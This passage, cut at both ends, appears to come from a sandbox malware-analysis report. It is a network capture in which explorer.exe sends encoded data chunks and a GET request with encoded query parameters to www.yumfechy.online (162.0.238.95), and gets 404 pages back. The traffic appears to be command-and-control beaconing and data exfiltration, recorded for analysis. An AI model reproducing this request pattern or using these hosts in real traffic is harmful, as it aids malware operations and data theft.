64 56 66 59 78 5a 6c 4b 50 49 69 6e 33 62 43 77 6e 6b 6c 34 30 54 75 57 51 5a 4a 35 36 5a 7a 5a 35 46 43 5a 31 44 66 74 64 59 31 6b 72 70 41 69 55 54 59 35 71 69 53 77 64 2d 64 32 30 67 66 72 5a 41 6a 70 63 35 78 4a 38 71 53 46 5a 4c 67 66 76 35 75 5f 79 70 73 7a 66 47 43 44 61 43 4d 6f 4f 34 50 42 64 53 56 4a 61 45 68 68 44 6d 47 6f 50 4d 4a 71 6d 48 47 52 7e 4b 65 37 52 6b 38 56 72 79 6b 58 41 30 47 43 72 5a 6d 44 58 39 43 6c 45 51 68 77 6b 5a 31 2d 4a 77 51 75 50 71 38 44 38 67 7e 4a 4a 54 63 5a 32 49 6f 6f 39 55 78 67 50 36 34 75 76 4e 4a 62 75 69 54 62 7e 57 37 66 55 71 4e 43 41 41 42 57 30 6f 58 35 66 49 6a 57 36 52 54 72 47 50 63 75 4b 61 58 48 54 6f 46 39 5a 37 73 62 6c 49 32 78 6c 76 4d 7a 69 67 70 49 79 50 54 54 31 59 6b 57 34 62 45 Data Ascii: jXu=qqJKnnr2O7rcVHLA0WMhcVmnSbwdc2dKZI9TL44iN057P60pJ2qTp9nPZpaCf42gxuUDKfdMo7(sSBH8jDp19_Y71lBR97v2qR6JQA(uvT9t99gwCQf0ouYTJ8mw5cx6u2KVxQcRqtve1mkVlupHtPa7vDrTbYCwlCdpXDFahDwvA2sRYvGnGegv4J7Tk702leUI95JaRvmBL4E41C1VP4v0pq3DpWqUUjniz6E5BPOZ1LXS5s6DsJ(vD0qaJ9x8AKiMpddQUqUxkFF3RfL2G3slm9afPH2q6l5l1KTj7cDJJM9mH-eNfr9VvN6j4d7CDg2nLSoQTfi0mAvBLEgoJeGQeQNJ3n9OO_PoYmZLbQMkeiN-wZ3-obOo(L7Efx0RgnOjDMT27pe0MXXNIo4FpRdkqR8GXocb(158aiQUyxUNgRGuhXk_n1B-Ya65u9NF4EVL6Om-5XATx42eUDU7i0C2h2KfThrMYdEVna2LXucIDxtdhfTIYJkNbp(CbHT4MEtkemf0ccrgDNKCjE5TkIjD5mRX(Grg4PLh3VMn8_u7nyUl9h8ndboEdaothoGwI_1u37dD5YpfynNYsr1thyU6dOBJ12LVJBgCm603IOgEqpVDibT5kY8e7NZOeS3Z0k(PNR9QiiR29TxcPiprMLhxKKSVceuj8r1xyMgpTjrsGPVh6t9wt82C3VEXDTFSZDnuoVwjRabmOpnxwGzlk1dhLMmb1j0SrX3llFuSytDQ9Q8fwOPLKKG14woxP1c7AZW8a5EpFjGEOqCOGsb3fal318uza5yK(5~KenTiZHqnyBQpeZPPtZrjSY6vkcNsK0Uu93KV3_iM65ojBSFXF5E1ILxtA81AoNhjoIMLRQLIaOUhfBozYn(DB78w3rin5ZlzpB7DGLxzMENzOU2_~mcI1fL81IV-KfUcCurMs12lXFSR9Oqi(nc7VK4tt-BSavWF6hK66V2dmcyhlH4dfTFLj4QYsznMu3g7iNuOvBespdtG~OcmWycQIAhH4yeqqnBzOO93Id4D~XxJGjzWAYc0LcaIZHDhToi9VkFJHt8GiN0Mce0DYJCGofEk1UT_0q4-NsodRHCXdyIwTqQadVfYxZlKPIin3bCwnkl40TuWQZJ56ZzZ5FCZ1DftdY1krpAiUTY5qiSwd-d20gfrZAjpc5xJ8qSFZLgfv5u_ypszfGCDaCMoO4PBdSVJaEhhDmGoPMJqmHGR~Ke7Rk8VrykXA0GCrZmDX9ClEQhwkZ1-JwQuPq8D8g~JJTcZ2Ioo9UxgP64uvNJbuiTb~W7fUqNCAABW0oX5fIjW6RTrGPcuKaXHToF9Z7sblI2xlvMzigpIyPTT1YkW4bE7qRcCTeOt(C1wjxFIBOkWNTepnz(hGMPUDkN0lnWYHzTkXwrYNI(FldyLnF6bKqv9s_yyWiDxwq4UmbKulBraVCwlYnyHsOmU2XramNZ6ciD-RSGue2ujpyg6E7kvfbyEvKM1jtG_sBvlYrGdkACbaCGBPyHDCyNxLxvC4dH9CB1dA3mt74lUWxpOdE~d7wRzEfCyOnQKtU7q5scy2UdPV-DKscQdyH(vOhqGsU5MGxFoiBbezFbEq85h(-CvtAwRkJmr~3Sioh(BA0ZuIdNbAfGTqq6GVpWvzOrw(98fMhj6cRu-NwKlFLsl3EbI96PUJIuoaofcF5gLTxhvWex7UHCDIyKpq-W46ViEnkMQGRCaVrz4MESqB3mkaFzQFF7J7Kqj9qEarG5qsnftvlPlNMwyES2zLDOYVs77uqlU55MW(U8S037Q490C2cKRGWholnQTdcrz7aVkzaAwLy4N9kZZqDd4d6cTl6qGBIHi8W2CEHFHRPa8~vy8BrGn7dijZ1dimy3OeDLeU1tFGVmFES4M8WP_~mQw7rcHR27826w1j228LpA1hWaBcV2II-PBPcAw7Y9HVOVt1bzmG_b2P7IrQGoXmPWoxyVOtveLMfva7daQqdVqA_qO0l8ax2PJl4aSXv(aanGT0dmRWlrD4nisHEdf~dcj7IRsqcKiFvZJl2QqCJUljUaR1P~7moMIHapPx4BQKli3sDv8FLhHJJ2jQB3-VdQ90es6ZgzGMyBg5dFldPudo9TstMxHzqV1nGSok8bn2QWSfLUeHPspjPOayvE2Ts(5UHEbfVDO5W0Oi-I2Yd0_19RilR6rztO_V-Gq4RwcvAbuvQ0VdivC83cK9-OwC2ZHwiw7i_~l7nVCw7kNmPrfoe5Sh89hTeZIflqCmoCFRFlm0-wJoyOLq7lAglBawDFlCnfFe6RZR4mQSvKQCqEy0S7l0nVonMHjVURTRgpbijSVbmrgGUWvfHfD(dUkG8SFBXNSqg56~iEZHz~cXDgIAKh8yQlu6TaMUzrj~oBi55Ip(F0KaV0sOVY3eyCkCu~VYpBDn3PYRBTW4TZA~leGfrvqErY3ZY5A7WYbFDifFxiK1bgFMEABmFxVwTQ0VS8jh_7cVsUZciyKsIsNPAKeOOq4q2gyms8xFpwYsWdPPIzwBd1supeIi8RXO81g(sL1iscWJu2T9V(xARsLU-mvwyz_MxlMHeAgT3c3YcgSpi7CC96wbqrr9cpV(n4S8SLYQ-AaWVCB4cBTSjRBXJeNx2(oVpYeG8flSFZ5wFtpS2PgtqN5QqhrG_zJuA9s~q5ouBnCyxLbU5eh3udTu8ME1WpirErK68g_y7~gp-QK~i(s0_IcuFLC2JLTsar2uHpQHlFBWjykHejZ5CuP6K5c2lXg~tmFYjmKXec-uSjnUlbQfh1Iwlw7Khx6SsNSvE80sG9Ndau4faN1~JheLgZFCBC0VKwFg2O_U9NhMD9vqkUaP7WAqLui4PmSB7nmf8FqF936TnPJjKvQYsPEk2sn8puuh4pZDn0sOCkWv3hSEmYvQJnS5l(M22sjphC7oxrJwXHAXhV27iIVx6DhU_wRyt2qWEyxh8jcty2NhQF3tsTQL6KUx8nkxwX8jzkF3TKM9S9qYASfjZ2FiX3a31(fUnCCJg0JqyyF5dtUGu3AgcyXaL5d4fK7OM(rQrzFAP9rmF2RnrQT~gFu(U0CtAR51irWxWuUWrEDbkMG3EoecWkR9t1_NwjziRkYJBdlcHqSbCKgBapwCHfE9XBP~YiABoyKXCStsftfPjXEU93QA_Xv3J7UAn5UpKfMRDpkIFT8Q9d3iBrB6OKBhIh_rWINbKnwqxYLd155WAmePTOXwPN8KbWmz1bz4UridEvWeXVZ1YscouljuRmuOxcpjmSLlhIq6C9YdcDMfq1XuRj6uZhUxArqWMLESEogM4X2Gtrw2ZLnHfANKHdH(X5a7jqz87cAnxcC12ew36vEcWT757jYLhSEngHRaK5GdoINgn4AHc5LXFUwO-Nv0xZ7NkP8DMKg1jK8P_UpiFuaO4ujg7Rlqxz2K5p1bZnvsc4xmBqxgGuxCslLG6xMAr9ReLcfkrItBCDgd0YB6XTMSWHxSOjFQUfi9zIA5jNNB73pny7cbKBHWygcvZuKbjbu0vfTz0Pwu9~gd0ZFFP3RlwIYqNacm855LiDiwPG34oJkcJWNfk(2Z2t5BDn4T2lbphC502b1XHPetTUHuf98NYOqy4J37ZEpwSb3EiHjp4~jnep_wQknks~B~w~KVmThIVEt~r~DqwUSX4FVm4VBM5NbnNi8k9MqU79jYRwbEJIdE88o(T7_EmRvKaXfvZ8hlD1y5ZPYT5zvXuFsuAG2DM0nefnWO09b(H7QiCXravCR9IneWkd95T~d8qnBqZnuO-kuw_yHq9G7BkzZJK8USrgqOMsxQrpWP1T7owimMtJXAl(j1beeDeRoiyanBhp6JsMqvIiJUvnfhiXLJsOAhGROI9ZmPrM-gfnBtSddtCHwQmTBmfW217ugaRmQQjK7AEqNWi8AGgqbhs26Xh0uvj7AJt1CmwEt4gWl5bbroCXLdV36NYa2gsCaRJXJNRrcHiGDFzIa1gOkeLLsEPKkkkDpmkG_90B3MI574qixFNCAeGUs5Sv5SrBhmkS_2sivVdhoauW6vtWsH0Yy18hif2ens3eww86HKvcEf8d3Xni9MCwswv
Oct 26, 2022 13:19:40.081813097 CEST	1565	OUT	Data Raw: 37 32 4c 31 75 7a 62 75 53 4b 2d 32 57 79 35 28 49 5a 6e 63 56 51 6f 67 41 37 32 5a 52 47 68 69 5f 4a 63 4c 49 32 30 50 58 52 77 76 64 37 66 4b 79 68 75 72 6a 44 4d 57 59 44 43 61 74 7a 76 51 38 6a 67 6e 2d 6e 77 61 50 6b 72 48 2d 37 39 6f 4e 4c Data Ascii: 72L1uzbuSK-2Wy5(IZncVQogA72ZRGhi_JcLI20PXRwvd7fKyhurjDMWYDCatzvQ8jgn-nwaPkrH-79oNL0Zj(cWvY4jo54Wbxzz6T9qy3mx-rrn5vCJFg-oyEHJ6E1WA(dNTAkdR3dAK7nkMRdOXHWVsL6epK5d6lYgv~udr2kqyedr9THNveyEbL4JspvxrYjJYNBYyTa88ykDW3eQo3TKb9AN1IlXBfKOq7mFT9j93O6Ag0T
Oct 26, 2022 13:19:40.238704920 CEST	1573	OUT	Data Raw: 62 6c 6a 52 66 62 47 39 77 6e 4d 6f 68 6e 76 6f 4b 54 73 31 76 77 45 58 5a 6b 44 4b 79 7a 30 47 66 38 52 39 73 75 31 69 78 6f 38 6c 79 46 66 51 4a 43 6e 36 51 63 52 51 70 75 70 32 50 71 37 63 73 72 30 4b 74 48 42 53 59 51 62 46 67 74 75 55 64 47 Data Ascii: bljRfbG9wnMohnvoKTs1vwEXZkDKyz0Gf8R9su1ixo8lyFfQJCn6QcRQpup2Pq7csr0KtHBSYQbFgtuUdGNZO(sInM8ibasUyy9dJnnYIU0uGlJk7IUlT1BIURxe3elhO5fLQOQEf0jZqPbpNgR(8kx1S1vPYOJn8Q53MO4nk53mZuZpxYXo70LSZr1OGbyKq3w84iKOelwrUDVf4jSPpNIFZf9rDbo9L9Tk_cAWt8b8jj-0sNc
Oct 26, 2022 13:19:40.238748074 CEST	1578	OUT	Data Raw: 62 48 66 41 36 37 38 36 73 70 2d 31 4a 76 6d 6f 35 44 37 59 75 63 72 5a 49 6f 6b 58 70 7a 36 65 43 59 33 76 77 56 4d 54 6a 7e 4f 69 41 51 66 72 42 33 55 52 44 50 76 4c 71 41 41 39 5a 5a 55 59 52 66 4f 56 63 30 56 69 54 4d 6d 72 77 7a 79 55 5a 76 Data Ascii: bHfA6786sp-1Jvmo5D7YucrZIokXpz6eCY3vwVMTj~OiAQfrB3URDPvLqAA9ZZUYRfOVc0ViTMmrwzyUZvUPKREJVQQvI8KcxaiV3ySHK~ToylLQmYe~p0EepizSuLe7P7qQ800XZdOdMMMWjWdlfAATqkGLt0TgkvJnhavTinrKT19kezPCl(1q2gwn_inBDsgLCig7D(7Elh7kAZGMvzRA_KJp3UgL1Aqk6sQodsRINZhfV8z
Oct 26, 2022 13:19:40.239139080 CEST	1588	OUT	Data Raw: 5a 7a 48 65 56 54 66 43 31 75 45 34 62 37 4e 62 6d 7a 53 31 67 35 54 70 6d 49 38 51 5a 4d 67 45 32 6b 57 68 43 62 50 35 36 53 49 62 36 6f 76 31 6d 48 49 44 41 51 68 44 53 73 73 33 59 64 35 37 35 7a 37 48 37 32 70 58 57 58 2d 6b 6f 77 4d 72 37 75 Data Ascii: ZzHeVTfC1uE4b7NbmzS1g5TpmI8QZMgE2kWhCbP56SIb6ov1mHIDAQhDSss3Yd575z7H72pXWX-kowMr7uPKMIi4bNT9nptrtR-RFhypMcGDEPIZhu2h9DjqIr7iEQcm_U_DaPfSrWvv-JHqrUOCbtou6NZNbag2MQVmBaCtSdfWh8QSLzXTY4_YfTFXJ2LGpJWEU6rCCyS55vhEVQOZzl1mb7-8t1AiGFcbNY1WppTG0y_zt9V
Oct 26, 2022 13:19:40.239304066 CEST	1591	OUT	Data Raw: 66 36 48 31 57 6e 42 52 74 4e 5a 78 63 33 42 39 6f 4d 65 33 71 43 70 75 62 5a 32 4a 2d 76 34 67 54 38 63 76 6a 53 38 54 79 71 42 41 70 51 38 56 79 55 4a 43 66 4e 71 68 6b 45 66 51 41 7e 4b 35 48 57 4e 5a 57 79 65 7e 6b 68 31 76 6d 30 4b 73 52 6f Data Ascii: f6H1WnBRtNZxc3B9oMe3qCpubZ2J-v4gT8cvjS8TyqBApQ8VyUJCfNqhkEfQA~K5HWNZWye~kh1vm0KsRo8wrxP2KF88CPdIIYeQST5mkr9yRx3Legb(mdDHiCWVuMsYN(s02(VZWcpwaQblW7sh-kALFYWxVJdsVkktSBKiIR4EsJGC_NK(lLTbb(1trPz~UiOtol0kSgEFPureIoyv-q6Gu2h66ykCFdD~u4tWt4P6wIhE76H
Oct 26, 2022 13:19:40.395355940 CEST	1594	OUT	Data Raw: 63 4e 35 72 43 79 57 6b 58 46 78 67 35 45 51 58 33 71 51 48 49 34 59 41 32 77 73 6a 37 47 52 73 54 44 4a 4e 57 65 70 36 67 4e 76 41 34 6a 36 37 61 55 68 50 6b 68 6b 30 48 6f 47 49 4d 52 45 4c 7a 48 7a 57 61 51 43 32 5f 6d 76 35 49 39 57 56 42 4e Data Ascii: cN5rCyWkXFxg5EQX3qQHI4YA2wsj7GRsTDJNWep6gNvA4j67aUhPkhk0HoGIMRELzHzWaQC2_mv5I9WVBNjCWIIhyYumCFDswxInkLFYXEGWYcs~ygAVDoZeOZzd3auh12h1Q1UYyOz6sxykMz_(mMh6PA0X228CUxLwNqzgOR3eLQpwOFAtWhpCgjuXpjjcLscfJ12H4c_s4KQFnEfu78n7u(QXiAVuPbx0DFN8QKv6L2h~6vj
Oct 26, 2022 13:19:40.395467043 CEST	1601	OUT	Data Raw: 75 45 4e 7a 58 31 50 43 46 4d 4f 4d 64 65 59 69 62 6f 2d 35 55 6a 38 4c 48 61 49 35 4a 4a 46 37 68 61 64 47 6c 59 55 4d 31 45 32 76 74 4b 51 53 30 47 61 41 4b 62 30 6d 72 79 5f 49 36 67 4d 53 71 48 6e 4f 55 54 4d 6c 55 57 74 71 51 69 4a 34 7a 46 Data Ascii: uENzX1PCFMOMdeYibo-5Uj8LHaI5JJF7hadGlYUM1E2vtKQS0GaAKb0mry_I6gMSqHnOUTMlUWtqQiJ4zFMwsXR39u33JLybi7MLMGhnDIshgbu40wJBehBwqydx_fyHt2Zjv~Cev4-QD5LmETPKe30pGaygN6W7Nj1AEI_XEgQJyZmHwKFaZ0nyX6j7IVJdrQKe99P(G813yquhm9paEb2a6aFb3ULSQrEHGB1odRd2zWVSaZS
Oct 26, 2022 13:19:40.395525932 CEST	1604	OUT	Data Raw: 43 49 51 38 5a 5a 45 56 50 44 62 6f 34 56 54 71 38 44 65 28 37 79 72 59 70 38 31 6a 71 66 6e 4a 31 71 47 77 6d 34 5a 7e 5f 4e 4e 77 4f 46 52 72 6c 61 7a 4e 73 48 7a 71 61 43 43 74 46 35 30 37 37 36 2d 7e 34 69 77 41 46 69 56 51 6f 45 51 46 34 52 Data Ascii: CIQ8ZZEVPDbo4VTq8De(7yrYp81jqfnJ1qGwm4Z~_NNwOFRrlazNsHzqaCCtF50776-~4iwAFiVQoEQF4RObIBEEqRKUTXxfaL8gRus21xNjU80GGjaaY4YSV913C1v8oqnmBbLo0gPPbC-Mo~lHPB15z8yVbc7Z4RswYujatEFySl9WOz-utmgL61o2oXyv151bvRH6JLlACh2~z7-wDZCJ85vzbl8k7YDvERxXsJ94MhpRDu5
Oct 26, 2022 13:19:40.395908117 CEST	1605	OUT	Data Raw: 52 53 56 38 47 62 55 71 44 58 71 7a 58 39 50 6f 76 6b 68 6c 56 6c 76 50 43 30 5a 4f 6f 6a 72 47 77 30 71 38 56 6f 43 6b 77 70 48 47 30 44 77 4f 45 4b 75 74 6b 31 39 56 48 51 49 5a 4a 30 67 6e 55 7e 5a 53 67 4c 45 71 55 34 4e 65 78 62 5f 43 6d 45 Data Ascii: RSV8GbUqDXqzX9PovkhlVlvPC0ZOojrGw0q8VoCkwpHG0DwOEKutk19VHQIZJ0gnU~ZSgLEqU4Nexb_CmEEWIS06dBx(CCR~Eh3HcRM(jHetAO70sIdiSh21aJZAsZeTxVo9bwnXn5mFg88gI0gLJCI2MT10jJEDcI06tbTuqrq8yXxcUo7v4ebb295DjuEJCJeGa8CYStRQaGP3H7ujDSEQfqTnfqB0591i0ClRIvlN0~0l1jm
Oct 26, 2022 13:19:40.661492109 CEST	1606	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:19:40 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.11.20	49918	162.0.238.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:42.268295050 CEST	1607	OUT	GET /d0ad/?jXu=nohqkTeNBtLDTjvj2EgrRXuLLYVzZlI3Z/lUYKUGfmhSQZo0Fk3aztyWPJehU7Kl8eQVGPUpo63pAyjMlhEJyeFl0k1W9K+Dpw==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.yumfechy.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:19:42.518376112 CEST	1608	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:19:42 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa 